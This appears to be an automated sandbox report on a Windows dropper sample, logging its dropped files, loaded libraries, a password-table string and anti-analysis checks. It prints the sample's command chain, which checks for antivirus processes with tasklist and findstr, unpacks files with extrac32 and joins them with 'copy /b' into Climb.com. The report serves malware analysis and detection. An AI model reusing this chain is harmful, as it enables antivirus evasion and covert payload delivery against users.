        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: Climb.com, 0000000D.00000003.2190973677.0000000003CA9000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2167739570.0000000003C97000.00000004.00000800.00020000.00000000.sdmp, Climb.com, 0000000D.00000003.2190635881.0000000003C9E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: vUcZzNWkKc.exeReversingLabs: Detection: 47%
        Source: vUcZzNWkKc.exeVirustotal: Detection: 31%
        Source: vUcZzNWkKc.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
        Source: vUcZzNWkKc.exeString found in binary or memory: 3The file %s is missing. Please, re-install this application
        Source: unknownProcess created: C:\Users\user\Desktop\vUcZzNWkKc.exe "C:\Users\user\Desktop\vUcZzNWkKc.exe"
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe"
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe"
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmd
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Reflect
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled V
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com V
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess created: C:\Users\user\AppData\Local\Temp\PasoCattle.exe "C:\Users\user\AppData\Local\Temp\PasoCattle.exe" Jump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess created: C:\Users\user\AppData\Local\Temp\Set-up.exe "C:\Users\user\AppData\Local\Temp\Set-up.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Symposium Symposium.cmd & Symposium.cmdJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 768400Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E ReflectJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "cocks" Articles Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Maternity + ..\Beaches + ..\Rat + ..\Promise + ..\Zone + ..\Enrolled VJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\768400\Climb.com Climb.com VJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: slc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\Set-up.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wsock32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: napinsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wshbth.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: nlaapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winrnr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: vUcZzNWkKc.exeStatic file information: File size 7088640 > 1048576
        Source: vUcZzNWkKc.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x518a00
        Source: vUcZzNWkKc.exeStatic PE information: Raw size of ycplgdyn is bigger than: 0x100000 < 0x1a5200

        Data Obfuscation

        barindex
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeUnpacked PE file: 0.2.vUcZzNWkKc.exe.610000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ycplgdyn:EW;spankfnb:EW;.taggant:EW; vs :ER;.rsrc:W;
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 1_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00406328
        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
        Source: vUcZzNWkKc.exeStatic PE information: real checksum: 0x6c986d should be: 0x6c95fd
        Source: PasoCattle.exe.0.drStatic PE information: real checksum: 0x102e74 should be: 0x10b21d
        Source: vUcZzNWkKc.exeStatic PE information: section name:
        Source: vUcZzNWkKc.exeStatic PE information: section name: .idata
        Source: vUcZzNWkKc.exeStatic PE information: section name:
        Source: vUcZzNWkKc.exeStatic PE information: section name: ycplgdyn
        Source: vUcZzNWkKc.exeStatic PE information: section name: spankfnb
        Source: vUcZzNWkKc.exeStatic PE information: section name: .taggant
        Source: Set-up.exe.0.drStatic PE information: section name: .eh_fram
        Source: vUcZzNWkKc.exeStatic PE information: section name: ycplgdyn entropy: 7.952986238509369

        Persistence and Installation Behavior

        barindex
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
        Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\768400\Climb.comJump to dropped file
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile created: C:\Users\user\AppData\Local\Temp\Set-up.exeJump to dropped file
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeFile created: C:\Users\user\AppData\Local\Temp\PasoCattle.exeJump to dropped file

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeWindow searched: window name: RegmonClassJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\vUcZzNWkKc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
